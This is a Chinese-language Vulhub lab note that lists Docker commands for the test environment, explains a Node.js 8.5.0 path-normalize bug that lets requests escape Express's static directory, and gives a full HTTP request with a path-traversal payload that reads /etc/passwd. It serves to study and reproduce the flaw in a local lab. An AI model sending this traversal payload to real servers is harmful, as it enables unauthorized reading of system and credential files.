Vulhub:
(进入到vulhub某个具体目录后)docker 操作常用的命令
docker ps
docker-compose up -d
docker inspect 容器ID | grep IPAddress 查找镜像IP
docker-compose down 关闭镜像(每次用完后关闭)
docker exec -it ID /bin/bash 进入指定镜像里面(根据上一条查出的ID进入)
例如进入mysql镜像,登录mysql数据库方法
#docker exec -it "当前运行的docker名字" bash
#mysql -u root -p
漏洞原理
参考文档:
原因是 Node.js 8.5.0 对目录进行normalize
操作时出现了逻辑错误,导致向上层跳跃的时候(如../../../../../../etc/passwd
),在中间位置增加foo/../
(如../../../foo/../../../../etc/passwd
),即可使normalize
返回/etc/passwd
,但实际上正确结果应该是../../../../../../etc/passwd
。
express这类web框架,通常会提供了静态文件服务器的功能,这些功能依赖于normalize
函数。比如,express在判断path是否超出静态目录范围时,就用到了normalize
函数,上述BUG导致normalize
函数返回错误结果导致绕过了检查,造成任意文件读取漏洞。
当然,normalize
的BUG可以影响的绝非仅有express,更有待深入挖掘。不过因为这个BUG是node 8.5.0 中引入的,在 8.6 中就进行了修复,所以影响范围有限。
漏洞复现
编译及运行环境:
访问http://your-ip:3000/
即可查看到一个web页面,其中引用到了文件/static/main.js
,说明其存在静态文件服务器。
发送如下数据包,即可读取passwd:
GET /static/../../../a/../../../../etc/passwd HTTP/1.1
Host: your-ip:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close